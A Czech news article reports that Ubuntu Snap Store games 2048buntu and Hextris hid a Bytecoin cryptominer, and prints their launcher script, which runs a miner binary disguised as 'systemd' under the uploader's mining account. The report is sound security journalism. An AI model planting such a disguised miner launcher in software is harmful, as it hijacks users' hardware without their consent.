Hlavní navigace

Ubuntu Snap Store obsahoval balíčky těžící kryptoměny

Petr Krčmář

V repozitáři Ubuntu Snap Store byly objeveny balíčky, které kromě kýžené funkcionality obsahovaly i skripty pro těžbu kryptoměn. Bez důkladné kontroly se neobejdeme ani tady a open source nemusí znamenat bezpečný.

Doba čtení: 2 minuty

Balíčky instalovatelné přímo z Ubuntu Software Center musí být bezpečné. Takový dojem mohla mít doposud řada uživatelů, ale jak bylo nyní ukázáno, nemusí to platit za všech okolností. V některých balíčcích z Ubuntu Snap Store se totiž ukrýval kód pro těžbu kryptoměn.

Technicky tak sice nešlo o malware, protože upravené aplikace nekradly data a nijak přímo cílový počítač neohrožovaly, ale přesto je jejich chování pro většinu uživatelů nepřijatelné. Těžba kryptoměn bez souhlasu uživatele se ve slušné společnosti netoleruje. Zvyšuje zatížení i spotřebu počítače a hlavně zneužívá hardware k činnosti, ke které nedal uživatel vědomě souhlas.

Před dvěma dny bylo nahlášeno, že v některých balíčcích se nachází kryptominer těžící měnu Bytecoin. Pod napadenými Snapy byl podepsán Nicolas Tomb. Všechny balíčky tohoto autora byly odstraněny, dokud neproběhne podrobné vyšetřování.

Jednalo se minimálně o dvě hry: 2048buntu a Hextris. V obou případech vypadal jejich zaváděcí skript takto:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Kromě veselé e-mailové adresy je zajímavé také to, že autor zveřejnil snapy pod proprietární licencí, protože například zneužitá hra 2048 je k dispozici pod licencí MIT. Ta umožňuje distribuci upraveného díla pod restriktivní licencí bez dostupnosti zdrojových kódů.

Balíček už sice není v repozitáři dostupný, ale jeho stránka je stále uložena v Google Cache. Dozvíme se tak základní informace o balíčku, i když jeho obsah už k dispozici není. Bohužel repozitář neuvádí počty instalací, takže se nedozvíme, kolik uživatelů si některý z balíčků stáhlo.

Plyne z toho několik poučení: Že je něco open source, automaticky neznamená, že je to bezpečné. Někdo se na to nejdřív musí podívat. Ovšem protože je to open source, může se na to někdo podívat a přijít na podobný problém. Žádný podobný repozitář nemůže zůstat úplně otevřený, aniž by na něm nepanovaly poměry jako na divokém západě. Své o tom ví správci repozitáře rozšíření pro Chrome, lidi kolem Google Play nebo třeba společnost Apple se svým App Store.

Balíčky Snap nevytvářejí vývojáři distribucí, ale do repozitáře je může vložit kdokoliv. To je ostatně jejich princip: rychlý přístup k nejčerstvějšímu software. Poměrně rychle se ale ukazuje, že bez zevrubné kontroly to nepůjde ani tady, protože pokud je možné něco zneužít, bude to zneužito.

Našli jste v článku chybu?